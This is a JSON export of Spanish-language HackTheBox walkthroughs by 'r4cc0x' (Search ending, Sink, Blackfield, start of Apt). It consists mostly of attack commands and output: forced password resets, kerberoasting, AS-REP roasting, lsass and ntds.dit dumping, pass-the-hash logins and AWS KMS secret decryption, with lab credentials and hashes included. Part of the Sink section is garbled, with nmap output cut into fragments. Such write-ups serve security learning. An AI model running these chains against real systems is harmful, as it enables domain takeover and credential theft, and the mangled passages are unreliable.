`tristan.davies` ![Image](image-16.png) ```zsh bloodyAD --dc-ip \"10.10.11.129\" -d \"search.htb\" -u 'BIR-ADFS-GMSA$' -p ':e1e9fd9e46d0d747e1595167eedcec0f' set password tristan.davies 'P@ssword123!' ``` ![Image](image-18.png) El usuario ``tristan.davies`` es parte del grupo `DOMAIN ADMINS` quiere decir que es un administrador del dominio. ![Image](image-17.png) Como el usuario tristan.davies es parte del grupo con mayor privilegio `Domain Admins` podemos dumpear los hashes de todos los usuarios. ```zsh /usr/bin/impacket-secretsdump search.htb/tristan.davies:'P@ssword123!'@search.htb ``` ![Image](image-19.png) - Validate Credentials ```zsh nxc ldap 10.10.11.129 -u Administrator -H '5e3c0abbe0b4163c5612afe25c69ced6' LDAP 10.10.11.129 389 RESEARCH [*] Windows 10 / Server 2019 Build 17763 (name:RESEARCH) (domain:search.htb) LDAP 10.10.11.129 389 RESEARCH [+] search.htb\\Administrator:5e3c0abbe0b4163c5612afe25c69ced6 (Pwn3d!) ``` ```zsh impacket-wmiexec tristan.davies@search.htb -hashes 'aad3b435b51404eeaad3b435b51404ee:c5f2d015f316018f6405522825689ffe' ``` ![Image](image-20.png) ![Image](image-21.png)"},{"id":"sink","title":"HTB - Sink","description":"HTB - Sink","date":"2025-07-11T16:17:34.000Z","tags":["HackTheBox","AWS","kms","BurpSuite","HTTP-Request-Smuggling","Gitea","Cookie-Hijacking","Infomration-leakage","pspy"],"authors":["r4cc0x"],"url":"/blog/sink","content":"## Box Info | Name | Sink | | :-------------------- | ---------------: | | Release Date | 30 Jan, 2021 | | OS | Linux | | Rated Difficulty | Insane | ```zsh ping -c 3 10.10.10.225 PING 10.10.10.225 (10.10.10.225) 56(84) bytes of data. 64 bytes from 10.10.10.225: icmp_seq=1 ttl=63 time=124 ms 64 bytes from 10.10.10.225: icmp_seq=2 ttl=63 time=124 ms 64 bytes from 10.10.10.225: icmp_seq=3 ttl=63 time=123 ms ``` ```zsh sudo nmap -p- --open --min-rate 50000 -n -vv -Pn 10.10.10.225 -oG allPorts # Nmap 7.95 scan initiated Sun Jul 13 01:58:06 2025 as: /usr/lib/nmap/nmap --privileged -sCV -p 22,3000,5000 -oN targeted 10.10.10.225 Nmap scan report for 10.10.10.225 Host is up (0.12s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA) | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA) |_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519) 3000/tcp open http Golang net/http server |_http-title: Gitea: Git with a cup of tea | fingerprint-strings: | GenericLines, Help: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 200 OK | Content-Type: text/html; charset=UTF-8 | Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647 | Set-Cookie: i_like_gitea=627f278123fa98df; Path=/; HttpOnly | Set-Cookie: _csrf=muMzz4dppPImuG87LeEu03NrRaw6MTc1MjM4NjI5NDQ3Nzg5NTU5MQ; Path=/; Expires=Mon, 14 Jul 2025 05:58:14 GMT; HttpOnly | X-Frame-Options: SAMEORIGIN | Date: Sun, 13 Jul 2025 05:58:14 GMT | | | | | | | Gitea: Git with a cup of tea | | | | | | | | | | Page Not Found - Gitea: Git with a cup of tea | | | |_ \\n \\n \\n\\t \\n\\t \\n\\t \\n\\t SF:\\x20Gitea:\\x20Git\\x20with\\x20a\\x20cup\\x20of\\x20tea\\x20 \\n\\t \\n\\t \\ SF:n\\t \\n\\t \\n \\n \\n\\t \\n\\t \\n\\t \\n\\t Page\\x20Not\\x20Found\\x20-\\x20\\x20Gitea:\\x20Git\\x20with\\x SF:20a\\x20cup\\x20of\\x20tea\\x20 \\n\\t \\n\\t \\n\\t \\n\\t Z3})zzfQ3 ``` La tercera lo mismo un subdominio y credenciales. ![Image](image-16.png) ```zsh https://nagios.sink.htb Username : nagios_adm Password : g8 /dev/null | grep -v snap ``` ![Image](image-22.png) Tambien vemos otro usuario llamado david en ``/etc/passwd`` ![Image](image-23.png) ### PSPY ``` ./pspy64 ``` ![Image](image-24.png) Despues de esperar un rato ejecutando pspy solo encontro ese script en php que lo ejecuta el usuario root y por ende no tenemos permisos para leer. ## AWS Enumeration Volviendo a enumerar en la web de gitea encontramos que se esta utilizando AWS junto con unas claves. ![Image](image-25.png) ```zsh marcus@sink:/tmp$ aws Note: AWS CLI version 2, the latest major version of the AWS CLI, is now stable and recommended for general use. For more information, see the AWS CLI version 2 installation instructions at: https://docs.aws.amazon.com/cli/latest/userguide/install-cliv2.html usage: aws [options] [ ...] [parameters] To see help text, you can run: aws help aws help aws help aws: error: the following arguments are required: command ``` ```zsh aws secretsmanager list-secrets You must specify a region. You can also configure your region by running \"aws configure\". marcus@sink:/tmp$ aws configure ``` ```zsh 4W-S Acc Key ID : AK- IAIUEN3QWCP- STEITJQ 4W-S Sec Key : paVI8Vg -TWkPI3jD-NkdzUMvK4CcdXO2T7sePX0ddF Default region name [None]: eu Default output format [None]: json ``` > Use barras espaciadoras porque el github pages es un poco delicado. ## AWS Secrets Manager ```zsh aws --endpoint-url=\"http://127.0.0.1:4566\" secretsmanager list-secrets ``` ```json { \"SecretList\": [ { \"ARN\": \"arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-wDLec\", \"Name\": \"Jenkins Login\", \"Description\": \"Master Server to manage release cycle 1\", \"KmsKeyId\": \"\", \"RotationEnabled\": false, \"RotationLambdaARN\": \"\", \"RotationRules\": { \"AutomaticallyAfterDays\": 0 }, \"Tags\": [], \"SecretVersionsToStages\": { \"eb2a987e-bc6a-4b66-a89c-e3452eeaeb40\": [ \"AWSCURRENT\" ] } }, { \"ARN\": \"arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-uMVda\", \"Name\": \"Sink Panel\", \"Description\": \"A panel to manage the resources in the devnode\", \"KmsKeyId\": \"\", \"RotationEnabled\": false, \"RotationLambdaARN\": \"\", \"RotationRules\": { \"AutomaticallyAfterDays\": 0 }, \"Tags\": [], \"SecretVersionsToStages\": { \"11970b3b-74d9-4f21-96b6-9330b8c3d826\": [ \"AWSCURRENT\" ] } }, { \"ARN\": \"arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-PVNoO\", \"Name\": \"Jira Support\", \"Description\": \"Manage customer issues\", \"KmsKeyId\": \"\", \"RotationEnabled\": false, \"RotationLambdaARN\": \"\", \"RotationRules\": { \"AutomaticallyAfterDays\": 0 }, \"Tags\": [], \"SecretVersionsToStages\": { \"79b041d5-5aeb-4b27-ab3a-d5eed801b4a5\": [ \"AWSCURRENT\" ] } } ] } ``` ```zsh aws --endpoint-url=\"http://127.0.0.1:4566\" secretsmanager list-secrets | grep \"arn:aws\" | grep -oP '\".*?\"' | grep -v \"ARN\" | tr -d '\"' arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-wDLec arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-uMVda arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-PVNoO ``` ```zsh aws --endpoint-url=\"http://127.0.0.1:4566\" secretsmanager get-secret-value --secret-id \"arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-wDLec\" ``` Lo intentaremos con los 3 secrets id: ```zsh { \"ARN\": \"arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-wDLec\", \"Name\": \"Jenkins Login\", \"VersionId\": \"eb2a987e-bc6a-4b66-a89c-e3452eeaeb40\", \"SecretString\": \"{\\\"username\\\":\\\"john@sink.htb\\\",\\\"password\\\":\\\"R);\\\\)ShS99mZ~8j\\\"}\", \"VersionStages\": [ \"AWSCURRENT\" ], \"CreatedDate\": 1752385423 } { \"ARN\": \"arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-uMVda\", \"Name\": \"Sink Panel\", \"VersionId\": \"11970b3b-74d9-4f21-96b6-9330b8c3d826\", \"SecretString\": \"{\\\"username\\\":\\\"albert@sink.htb\\\",\\\"password\\\":\\\"Welcome123!\\\"}\", \"VersionStages\": [ \"AWSCURRENT\" ], \"CreatedDate\": 1752385423 } { \"ARN\": \"arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-PVNoO\", \"Name\": \"Jira Support\", \"VersionId\": \"79b041d5-5aeb-4b27-ab3a-d5eed801b4a5\", \"SecretString\": \"{\\\"username\\\":\\\"david@sink.htb\\\",\\\"password\\\":\\\"EALB=bcC=`a7f2#k\\\"}\", \"VersionStages\": [ \"AWSCURRENT\" ], \"CreatedDate\": 1752385423 } ``` Vemos el usuario david con una contraseña, intentaremos validar si podemos iniciar sesion como david. ```zsh david:EALB=bcC=`a7f2#k ``` ![Image](image-26.png) ``sudo -l`` ![Image](image-27.png) ## AWS KMS Decrypting File ```zsh aws --endpoint-url=\"http://127.0.0.1:4566\" kms list-keys ``` ```zsh aws --endpoint-url=\"http://127.0.0.1:4566\" kms list-keys | grep KeyId | awk 'NF{print $NF}' | tr -d '\"' | tr -d ',' ``` ``` 0b539917-5eff-45b2-9fa1-e13f0d2c42ac 16754494-4333-4f77-ad4c-d0b73d799939 2378914f-ea22-47af-8b0c-8252ef09cd5f 2bf9c582-eed7-482f-bfb6-2e4e7eb88b78 53bb45ef-bf96-47b2-a423-74d9b89a297a 804125db-bdf1-465a-a058-07fc87c0fad0 837a2f6e-e64c-45bc-a7aa-efa56a550401 881df7e3-fb6f-4c7b-9195-7f210e79e525 c5217c17-5675-42f7-a6ec-b5aa9b9dbbde f0579746-10c3-4fd1-b2ab-f312a5a0f3fc f2358fef-e813-4c59-87c8-70e50f6d4f70 ``` ```bash #!/bin/bash declare -a algorithms=(SYMETRIC_DEFAULT RSAES_OAEP_SHA_1 RSAES_OAEP_SHA_256) for algorithm in ${algorithms[@]}; do aws --endpoint-url=\"http://127.0.0.1:4566\" kms list-keys | grep KeyId | awk 'NF{print $NF}' | tr -d '\"' | tr -d ',' | while read key_id; do echo -e \"\\n[+] Testing key_id: $key_id and algorithm $algorithm:\\n\" aws --endpoint-url=\"http://127.0.0.1:4566\" kms decrypt --ciphertext-blob fileb:///home/david/Projects/Prod_Deployment/servers.enc --key-id \"$key_id\" --encryption-algorithm $algorithm done done ``` ![Image](image-28.png) ```zsh [+] Testing key_id: 804125db-bdf1-465a-a058-07fc87c0fad0 and algorithm RSAES_OAEP_SHA_256: { \"KeyId\": \"arn:aws:kms:us-east-1:000000000000:key/804125db-bdf1-465a-a058-07fc87c0fad0\", \"Plaintext\": \"H4sIAAAAAAAAAytOLSpLLSrWq8zNYaAVMAACMxMTMA0E6LSBkaExg6GxubmJqbmxqZkxg4GhkYGhAYOCAc1chARKi0sSixQUGIry80vwqSMkP0RBMTj+rbgUFHIyi0tS8xJTUoqsFJSUgAIF+UUlVgoWBkBmRn5xSTFIkYKCrkJyalFJsV5xZl62XkZJElSwLLE0pwQhmJKaBhIoLYaYnZeYm2qlkJiSm5kHMjixuNhKIb40tSqlNFDRNdLU0SMt1YhroINiRIJiaP4vzkynmR2E878hLP+bGALZBoaG5qamo/mfHsCgsY3JUVnT6ra3Ea8jq+qJhVuVUw32RXC+5E7RteNPdm7ff712xavQy6bsqbYZO3alZbyJ22V5nP/XtANG+iunh08t2GdR9vUKk2ON1IfdsSs864IuWBr95xPdoDtL9cA+janZtRmJyt8crn9a5V7e9aXp1BcO7bfCFyZ0v1w6a8vLAw7OG9crNK/RWukXUDTQATEKRsEoGAWjYBSMglEwCkbBKBgFo2AUjIJRMApGwSgYBaNgFIyCUTAKRsEoGAWjYBSMglEwRAEATgL7TAAoAAA=\", \"EncryptionAlgorithm\": \"RSAES_OAEP_SHA_256\" } ``` Desencriptamos en base64 y lo pasamos a un archivo llamado ``aws`` ```zsh echo \"H4sIAAAAAAAAAytOLSpLLSrWq8zNYaAVMAACMxMTMA0E6LSBkaExg6GxubmJqbmxqZkxg4GhkYGhAYOCAc1chARKi0sSixQUGIry80vwqSMkP0RBMTj+rbgUFHIyi0tS8xJTUoqsFJSUgAIF+UUlVgoWBkBmRn5xSTFIkYKCrkJyalFJsV5xZl62XkZJElSwLLE0pwQhmJKaBhIoLYaYnZeYm2qlkJiSm5kHMjixuNhKIb40tSqlNFDRNdLU0SMt1YhroINiRIJiaP4vzkynmR2E878hLP+bGALZBoaG5qamo/mfHsCgsY3JUVnT6ra3Ea8jq+qJhVuVUw32RXC+5E7RteNPdm7ff712xavQy6bsqbYZO3alZbyJ22V5nP/XtANG+iunh08t2GdR9vUKk2ON1IfdsSs864IuWBr95xPdoDtL9cA+janZtRmJyt8crn9a5V7e9aXp1BcO7bfCFyZ0v1w6a8vLAw7OG9crNK/RWukXUDTQATEKRsEoGAWjYBSMglEwCkbBKBgFo2AUjIJRMApGwSgYBaNgFIyCUTAKRsEoGAWjYBSMglEwRAEATgL7TAAoAAA=\" | base64 -d > aws ``` ```zsh file aws aws: gzip compressed data, from Unix, original size modulo 2^32 10240 ``` ```zsh mv aws aws.gz gunzipo aws.gz mv aws aws.tar tar -xf aws.tar ``` Una vez descomprimimos el archivo, tenemos 2 archivos. ![Image](image-29.png) El ``servers.yml`` contiene credenciales como root ![Image](image-30.png) Logeamos como root y maquina rooted. ![Image](image-31.png)"},{"id":"blackfield","title":"HTB - Blackfield","description":"HTB - Blackfield","date":"2025-07-11T00:00:00.000Z","tags":["HackTheBox","information-leakage","kerbrute","kerberoasting","ASREPRoasting","DACL","ForceChangePassword","Bloodhound","BackupPrivilege","robocopy","diskshadow","ntds"],"authors":["r4cc0x"],"url":"/blog/blackfield","content":"## Box Info | Name | Blackfield | | :-------------------- | ---------------: | | Release Date | 06 Jun, 2020 | | OS | Windows | | Rated Difficulty | Hard | ```zsh ping -c 3 10.10.10.192 PING 10.10.10.192 (10.10.10.192) 56(84) bytes of data. 64 bytes from 10.10.10.192: icmp_seq=1 ttl=127 time=130 ms 64 bytes from 10.10.10.192: icmp_seq=2 ttl=127 time=129 ms 64 bytes from 10.10.10.192: icmp_seq=3 ttl=127 time=129 ms ``` ## Recon ```zsh nmap -p- --open --min-rate 5000 -n -vv -Pn 10.10.10.192 -oG allPorts ``` ```zsh # Nmap 7.95 scan initiated Thu Jul 10 23:35:34 2025 as: /usr/lib/nmap/nmap --privileged -sCV -p 53,88,135,389,445,593,3268,5985 -oN targeted 10.10.10.192 Nmap scan report for 10.10.10.192 Host is up (0.13s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-11 10:35:41Z) 135/tcp open msrpc Microsoft Windows RPC 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2025-07-11T10:35:50 |_ start_date: N/A |_clock-skew: 6h59m59s ``` ```zsh nxc smb 10.10.10.192 SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False) ``` Con netexec y smb podemos obtener mayor informacion sobre la maquina como hostname, version del SO y el nombre de dominio. ```zsh nxc smb 10.10.10.192 --shares SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False) SMB 10.10.10.192 445 DC01 [-] Error enumerating shares: STATUS_USER_SESSION_DELETED ``` Tambien podemos enumerar el los archivos compartidos por smbclient con null session. ```zsh smbclient -L //BLACKFIELD.LOCAL/ -N Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share forensic Disk Forensic / Audit share. IPC$ IPC Remote IPC NETLOGON Disk Logon server share profiles$ Disk SYSVOL Disk Logon server share ``` O con smbmap la diferencia es que indica los permisos para saber que recursos podemos leer. ```zsh smbmap -H 10.10.10.192 -u 'test' ``` ```zsh [+] IP: 10.10.10.192:445 Name: BLACKFIELD.LOCAL Status: Authenticated Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share forensic NO ACCESS Forensic / Audit share. IPC$ READ ONLY Remote IPC NETLOGON NO ACCESS Logon server share profiles$ READ ONLY SYSVOL NO ACCESS Logon server share ``` Solo hay 2 recursos que podemos leer y el que mas llama la atencion es el `profiles$`. ``` smbmap -H 10.10.10.192 -u 'adaw' -r 'profiles$' --no-banner ``` Nos lista una gran fila de nombres de usuarios ![Image](image.png) Para saber que posibles usuarios son validos dentro del dominio, vamos a tomar la ultima fila es decir todos los usuarios para guardarlos en un archivo. ```zsh smbmap -H 10.10.10.192 -u 'adaw' -r 'profiles$' --no-banner | awk 'NF{print $NF}' > users ``` ## Kerbrute Con kerbrute enumeramos los usuarios validos que se encuentran en el dominio. ```zsh /opt/kerbrute/kerbrute userenum --dc 10.10.10.192 -d BLACKFIELD.LOCAL users ``` ![Image](image-1.png) Al tener 3 usuarios validos dentro del dominio podria intentar obtener un tgt a traves de ASREPRoast Attack ## Kerberoasting Attack ```zsh impacket-GetUserSPNs BLACKFIELD.LOCAL/support:#00^BlackKnight ``` ![Image](image-2.png) ## ASREP Roast Attack ```ZSH impacket-GetNPUsers BLACKFIELD.LOCAL/support -no-pass ``` ![Image](image-3.png) ### Crack Hash ```zsh john hash -w=/usr/share/wordlists/rockyou.txt ``` ![Image](image-4.png) ```dtd #00^BlackKnight ``` ### SMBMap ```zsh smbmap -H 10.10.10.192 -u 'support' -p '#00^BlackKnight' -r 'SYSVOL' --depth 10 --no-banner ``` Ahora podria enumerar todos los usuarios que se encuentran en el dominio ```zsh rpcclient -U 'support%#00^BlackKnight' 10.10.10.192 -c 'enumdomusers' | grep -oP '\\[.*?\\]' | grep -v \"0x\" | tr -d '[]' ``` ![Image](image-5.png) De igual forma con `ldapdomaindump` podemos obtener mayor informacion de los grupos y usuarios del dominio. ```zsh ldapdomaindump -u 'BLACKFIELD.LCOAL\\support' -p '#00^BlackKnight' 10.10.10.192 ``` ![Image](image-6.png) ## AUDIT2020 ### BloodHound ```zsh bloodhound-python -d BLACKFIELD.LOCAL -u support -p '#00^BlackKnight' -ns 10.10.10.192 --zip -c All ``` ![Image](image-7.png) ### DACL (ForceChangePassword) ```zsh bloodyAD --host 10.10.10.192 -d BLACKFIELD.LOCAL -u \"support\" -p '#00^BlackKnight' set password \"audit2020\" 'P@ssword123!' ``` ![Image](image-8.png) #### Validate Creds ```zsh nxc smb 10.10.10.192 -u 'audit2020' -p 'P@ssword123!' --shares ``` ![Image](image-9.png) Ahora podemos ver dentro del recurso \"forensic\" compartido. ```zsh smbclient //10.10.10.192/forensic -U 'audit2020%P@ssword123!' ``` ![Image](image-10.png) El lssas es un proceso critico en los sistemas windows que se encarga de la seguridad local incluyendo la autenticacion de usuarios. ```zsh 7z l lsass.zip ``` ![Image](image-11.png) ## Pypykatz ``` pypykatz lsa ``` ![Image](image-12.png) ```zsh pypypkatz lsa minidump lsaas.DMP ``` ![Image](image-13.png) ```zsh nxc smb 10.10.10.192 -u \"svc_backup\" -H \"9658d1d1dcd9250115e2205d9f48400d\" ``` ![Image](image-14.png) ``` nxc winrm 10.10.10.192 -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d' ``` ![Image](image-15.png) ```zsh evil-winrm -i 10.10.10.192 -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d' ``` ![Image](image-16.png) Podemos entrar al directorio del administrador pero aun no podemos visualizar la flag root.txt ![Image](image-17.png) ```powershell whoami /priv ``` ![Image](image-18.png) ## Privilege Escalation ``SeBackupPrivileges`` permite al usuario exportar subárboles de registro. ```powershell SeBackupPrivilege ``` [sebackupprivilege](https://juggernaut--sec-com.translate.goog/sebackupprivilege/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=es&_x_tr_pto=tc) El SYSTEM contiene la información (clave de arranque) necesaria para descifrar el archivo SAM y extraer los hashes que contiene. Los “archivos” SAM y SYSTEM son copias de las subárboles de registro SAM y SYSTEM representadas como un solo archivo. ```powershell reg save hklm\\system C:\\temp\\SYSTEM ``` ![Image](image-19.png) La **SAM** es un archivo de base de datos del sistema operativo Windows que contiene nombres de usuario y contraseñas locales . Las contraseñas del archivo SAM no se almacenan en texto plano, sino como hashes NTLM (MD4). ```powershell reg save hklm\\sam C:\\temp\\sam ``` Ahora extraemos la copia del hash de administrator del archivo SAM ```zsh /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam -system system local ``` ![Image](image-20.png) ```zsh nxc smb 10.10.10.192 -u \"Administrator\" -H '67ef902eae0d740df6257f273de75051' SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False) SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\\Administrator:67ef902eae0d740df6257f273de75051 STATUS_LOGON_FAILURE ``` Desafortunadamente lo que necesitamos es el hash del administrador del dominio y no local. Una cuenta de administrador local tiene control total sobre los recursos de una máquina específica, mientras que un administrador de dominio tiene control sobre múltiples máquinas y recursos dentro de un dominio de red. Incluso en el link sobre la Priv:`seBackupPrivilege` mencionan que se puede lograr obtener el NTDS.dit que es que contiene todos los hashes de los usuarios de un dominio. ![Image](image-21.png) ```powershell echo \"set context persistent nowriters\" | out-file ./diskshadow.txt -encoding ascii echo \"add volume c: alias temp\" | out-file ./diskshadow.txt -encoding ascii -append echo \"create\" | out-file ./diskshadow.txt -encoding ascii -append echo \"expose %temp% z:\" | out-file ./diskshadow.txt -encoding ascii -append ``` ![Image](image-22.png) Los comandos anteriores básicamente le dicen a diskshadow.exe que cree una copia de C: y la llame Z: y la exponga (la haga accesible como una unidad). ```powershell diskshadow.exe /s c:\\temp\\diskshadow.txt ``` ![Image](image-23.png) ```powershell robocopy /b Z:\\Windows\\ntds\\ . ntds.dit ``` ![Image](image-24.png) Descargamos con evil-winrm el archivo ``ntds.dit`` ![Image](image-25.png) ```zsh /usr/share/doc/python3-impacket/examples/secretsdump.py -system system -ntds ntds.dit local ``` ![Image](image-26.png) ```zsh nxc smb 10.10.10.192 -u \"Administrator\" -H '184fb5e5178480be64824d4cd53b99ee' ``` ![Image](image-27.png) ```zsh evil-winrm -i 10.10.10.192 -u 'Administrator' -H '184fb5e5178480be64824d4cd53b99ee' ``` ![Image](image-28.png)"},{"id":"apt","title":"HTB - Apt","description":"HTB - Apt","date":"2025-06-30T00:00:00.000Z","tags":["HackTheBox","Insane","kerberoasing","kerberos","IPv6","Active-Directory","NTLMv1","TGT","ASREPRoasting","TGS","Password-Spraying","Bypass-AMSI","winPEAS","NTDS","Registry-Hives","smb","zip2john","reg","evilwinrm","john"],"authors":["r4cc0x"],"url":"/blog/apt","content":"## Box Info | Name | Apt | | :-------------------- | ---------------: | | Release Date | 31 Oct, 2020 | | OS | Windows | | Rated Difficulty | Insane | ## Ping ```zsh ping -c 3 10.10.10.213 PING 10.10.10.213 (10.10.10.213) 56(84) bytes of data. 64 bytes from 10.10.10.213: icmp_seq=1 ttl=127 time=126 ms 64 bytes from 10.10.10.213: icmp_seq=2 ttl=127 time=126 ms 64 bytes from 10.10.10.213: icmp_seq=3 ttl=127 time=125 ms ttl 127 = Windows ``` ## Recon ```zsh nmap -sCV -p 80,135 10.10.10.213 -oN targeted Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 19:42 CST Nmap scan report for 10.10.10.213 Host is up (0.13s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: Gigantic Hosting | Home | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 135/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows ``` ## WhatWeb ```zsh whatweb http://10.10.10.213/ http://10.10.10.213/ [200 OK] Bootstrap, Country[RESERVED][ZZ], Email[sales@gigantichosting.com], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[10.10.10.213], JQuery, Microsoft-IIS[10.0], Script[application/x-javascript,text/javascript], Title[Gigantic Hosting | Home] ``` ## Enumeration ![Image](image.png) ### Directory Scan ```zsh dirsearch -u http://10.10.10.213/ ``` ![Image](image-1.png) ### Fuzzing Parameter ```zsh ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 'http://10.10.10.213/FUZZ.html' -fc 404 ``` ![Image](image-2.png) Vemos que son los mismos directorios que vimos en la pagina web, intentaremos hacer fuzzin pero ahora a la extension para ver si encontramos algo interesante ```zsh wfuzz -c --hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z list,asp-aspx http://10.10.10.213/FUZZ.FUZ2Z ``` ![Image](image-3.png) ## RPC [Network Services Pentesting - Msrpc](https://book.hacktricks.wiki/en/network-services-pentesting/135-pentesting-msrpc.html?highlight=rpc#identifying-ip-addresses) [Github - IOXIDResovler](https://github.com/mubix/IOXIDResolver) ```zsh python3 IOXIDResolver.py -t 10.10.10.213 [*] Retrieving network interface of 10.10.10.213 Address: apt Address: 10.10.10.213 Address: dead:beef::b885:d62a:d679:573f Address: dead:beef::f403:564:b500:5577 Address: dead:beef::205 ``` ### IPv6 ```zsh sudo nmap -p- --open --min-rate 5000 -n -vvv -Pn -6 dead:beef::b885:d62a:d679:573f -oG allPorts6 ``` ![Image](image-4.png) ```zsh nmap -sCV -p 53,80,88,135,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49673,49685,63154 -6 dead:beef::b885:d62a:d679:573f -oN targeted6 ``` ```php 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 | http-server-header: | Microsoft-HTTPAPI/2.0 |_ Microsoft-IIS/10.0 |_http-title: Bad Request 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-30 02:36:23Z) 135/tcp open msrpc Microsoft Windows RPC 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) |_ssl-date: 2025-06-30T02:37:30+00:00; +1s from scanner time. | ssl-cert: Subject: commonName=apt.htb.local | Subject Alternative Name: DNS:apt.htb.local | Not valid before: 2020-09-24T07:07:18 |_Not valid after: 2050-09-24T07:17:18 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) |_ssl-date: 2025-06-30T02:37:30+00:00; +1s from scanner time. | ssl-cert: Subject: commonName=apt.htb.local | Subject Alternative Name: DNS:apt.htb.local | Not valid before: 2020-09-24T07:07:18 |_Not valid after: 2050-09-24T07:17:18 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) |_ssl-date: 2025-06-30T02:37:30+00:00; +1s from scanner time. | ssl-cert: Subject: commonName=apt.htb.local | Subject Alternative Name: DNS:apt.htb.local | Not valid before: 2020-09-24T07:07:18 |_Not valid after: 2050-09-24T07:17:18 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) |_ssl-date: 2025-06-30T02:37:30+00:00; +1s from scanner time. | ssl-cert: Subject: commonName=apt.htb.local | Subject Alternative Name: DNS:apt.htb.local | Not valid before: 2020-09-24T07:07:18 |_Not valid after: 2050-09-24T07:17:18 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Bad Request |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Bad Request 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49670/tcp open msrpc Microsoft Windows RPC 49673/tcp open msrpc Microsoft Windows RPC 49685/tcp open msrpc Microsoft Windows RPC 63154/tcp open msrpc Microsoft Windows RPC Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -8m32s, deviation: 22m38s, median: 0s | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-time: | date: 2025-06-30T02:37:21 |_ start_date: 2025-06-30T01:35:21 | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: apt | NetBIOS computer name: APT\\x00 | Domain name: htb.local | Forest name: htb.local | FQDN: apt.htb.local |_ System time: 2025-06-30T03:37:23+01:00 | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required ``` > Tip: Tambien se puede enumerar el ipv6 a traves de snmp 